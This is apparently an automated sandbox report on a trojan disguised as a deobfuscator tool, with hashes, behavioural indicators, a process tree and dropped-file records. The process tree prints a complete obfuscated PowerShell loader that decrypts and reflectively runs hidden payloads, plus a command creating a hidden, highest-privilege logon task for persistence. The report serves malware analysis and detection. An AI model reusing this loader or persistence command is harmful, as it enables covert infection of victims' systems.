Analysis
-
max time kernel
10s -
max time network
12s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09-09-2024 19:31
Static task
static1
General
-
Target
armdot deobfuscator.exe
-
Size
275KB
-
MD5
2bce10bc9bf1c5e013965c7a60deae05
-
SHA1
7efa1765b1842f4ce9e746c26c7d8394ad7820ce
-
SHA256
5e74f08923fec3a5daf99b9a6c0763b21a98226f90c537235408a4258389ca01
-
SHA512
fbfadeb3f983cc76478864de82952ce34cb7543743a3421151827c5a8226d24ddff2409f71230dfc4bbfad441cea9a148a11a31c16e3890cd5a0797fe4a9e7c0
-
SSDEEP
6144:IwDHUsnM9rwQCz8vRtKT2OyD0Ek+c9NWtO5MxRxLJcNfZ:IAjMnZtgbyD0wyWtOcJeZ
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1140 powershell.exe 4728 powershell.exe 2360 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation armdot deobfuscator.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language armdot deobfuscator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1140 powershell.exe 1140 powershell.exe 4728 powershell.exe 4728 powershell.exe 2360 powershell.exe 2360 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeIncreaseQuotaPrivilege 4728 powershell.exe Token: SeSecurityPrivilege 4728 powershell.exe Token: SeTakeOwnershipPrivilege 4728 powershell.exe Token: SeLoadDriverPrivilege 4728 powershell.exe Token: SeSystemProfilePrivilege 4728 powershell.exe Token: SeSystemtimePrivilege 4728 powershell.exe Token: SeProfSingleProcessPrivilege 4728 powershell.exe Token: SeIncBasePriorityPrivilege 4728 powershell.exe Token: SeCreatePagefilePrivilege 4728 powershell.exe Token: SeBackupPrivilege 4728 powershell.exe Token: SeRestorePrivilege 4728 powershell.exe Token: SeShutdownPrivilege 4728 powershell.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeSystemEnvironmentPrivilege 4728 powershell.exe Token: SeRemoteShutdownPrivilege 4728 powershell.exe Token: SeUndockPrivilege 4728 powershell.exe Token: SeManageVolumePrivilege 4728 powershell.exe Token: 33 4728 powershell.exe Token: 34 4728 powershell.exe Token: 35 4728 powershell.exe Token: 36 4728 powershell.exe Token: SeIncreaseQuotaPrivilege 4728 powershell.exe Token: SeSecurityPrivilege 4728 powershell.exe Token: SeTakeOwnershipPrivilege 4728 powershell.exe Token: SeLoadDriverPrivilege 4728 powershell.exe Token: SeSystemProfilePrivilege 4728 powershell.exe Token: SeSystemtimePrivilege 4728 powershell.exe Token: SeProfSingleProcessPrivilege 4728 powershell.exe Token: SeIncBasePriorityPrivilege 4728 powershell.exe Token: SeCreatePagefilePrivilege 4728 powershell.exe Token: SeBackupPrivilege 4728 powershell.exe Token: SeRestorePrivilege 4728 powershell.exe Token: SeShutdownPrivilege 4728 powershell.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeSystemEnvironmentPrivilege 4728 powershell.exe Token: SeRemoteShutdownPrivilege 4728 powershell.exe Token: SeUndockPrivilege 4728 powershell.exe Token: SeManageVolumePrivilege 4728 powershell.exe Token: 33 4728 powershell.exe Token: 34 4728 powershell.exe Token: 35 4728 powershell.exe Token: 36 4728 powershell.exe Token: SeIncreaseQuotaPrivilege 4728 powershell.exe Token: SeSecurityPrivilege 4728 powershell.exe Token: SeTakeOwnershipPrivilege 4728 powershell.exe Token: SeLoadDriverPrivilege 4728 powershell.exe Token: SeSystemProfilePrivilege 4728 powershell.exe Token: SeSystemtimePrivilege 4728 powershell.exe Token: SeProfSingleProcessPrivilege 4728 powershell.exe Token: SeIncBasePriorityPrivilege 4728 powershell.exe Token: SeCreatePagefilePrivilege 4728 powershell.exe Token: SeBackupPrivilege 4728 powershell.exe Token: SeRestorePrivilege 4728 powershell.exe Token: SeShutdownPrivilege 4728 powershell.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeSystemEnvironmentPrivilege 4728 powershell.exe Token: SeRemoteShutdownPrivilege 4728 powershell.exe Token: SeUndockPrivilege 4728 powershell.exe Token: SeManageVolumePrivilege 4728 powershell.exe Token: 33 4728 powershell.exe Token: 34 4728 powershell.exe Token: 35 4728 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2444 wrote to memory of 5112 2444 armdot deobfuscator.exe 83 PID 2444 wrote to memory of 5112 2444 armdot deobfuscator.exe 83 PID 2444 wrote to memory of 5112 2444 armdot deobfuscator.exe 83 PID 5112 wrote to memory of 1140 5112 cmd.exe 87 PID 5112 wrote to memory of 1140 5112 cmd.exe 87 PID 5112 wrote to memory of 1140 5112 cmd.exe 87 PID 1140 wrote to memory of 4728 1140 powershell.exe 89 PID 1140 wrote to memory of 4728 1140 powershell.exe 89 PID 1140 wrote to memory of 4728 1140 powershell.exe 89 PID 1140 wrote to memory of 2920 1140 powershell.exe 92 PID 1140 wrote to memory of 2920 1140 powershell.exe 92 PID 1140 wrote to memory of 2920 1140 powershell.exe 92 PID 2920 wrote to memory of 4920 2920 WScript.exe 93 PID 2920 wrote to memory of 4920 2920 WScript.exe 93 PID 2920 wrote to memory of 4920 2920 WScript.exe 93 PID 4920 wrote to memory of 2360 4920 cmd.exe 95 PID 4920 wrote to memory of 2360 4920 cmd.exe 95 PID 4920 wrote to memory of 2360 4920 cmd.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\armdot deobfuscator.exe"C:\Users\Admin\AppData\Local\Temp\armdot deobfuscator.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\crypt2.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\crypt2.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\crypt2.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_505_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_505.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_505.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_505.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_505.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_505.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2360
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD555d32bc1c206428fe659912b361362de
SHA17056271e5cf73b03bafc4e616a0bc5a4cffc810f
SHA25637bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff
SHA5122602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c
-
Filesize
18KB
MD54a87c61ecc813e24d4a185b59ce220f4
SHA1feff765be082bc91fcf7b99839de5632f1023b22
SHA2567c45e22e034e3a99b691261d6b83dff71441acbcef0288b531742b500bfa58b8
SHA5129ba3d3f1711fc452646acb1976b2ef69bb36afc24df77147bb5b8abe3c25a0cebccdbad2bd522a327ad267fd8d0682ed438995ff23bf67c2506629ff3254405b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
270KB
MD53ea84c5d84c23aa2336ad19120ca2f69
SHA189f8c3ce7dff799df989d77b0589faeacf29577a
SHA256c96331a38563d38ce6ae9f99294c0b39a595275cfdaf1ea85f91f693a7c302e6
SHA5126aa2bf0d81b3fc103333e242492724dbfb45acb7ca5fd3289360bb7cff09d0bd524537570bc353f7ca92fb2e064aacdd3ee7e0a2fa4259b12056301050b8000f
-
Filesize
115B
MD583e83db0cd306f7165a8a42282012019
SHA1b77271a7928b93de89fff26a2e38a1c851c9c249
SHA256a2bc14481bb860fec61f4480a4e190f3f0e3b6d3872842039f14a9dd75e522a2
SHA5125eeff2e1554b6c2d86fad17d9cb8564a8f2c00a2b007205a942c2fc653ceb446eb2b3a8579ce70b63130d02374f4b3121da3fd1c2652ebb1b9ee85f9d92e9daf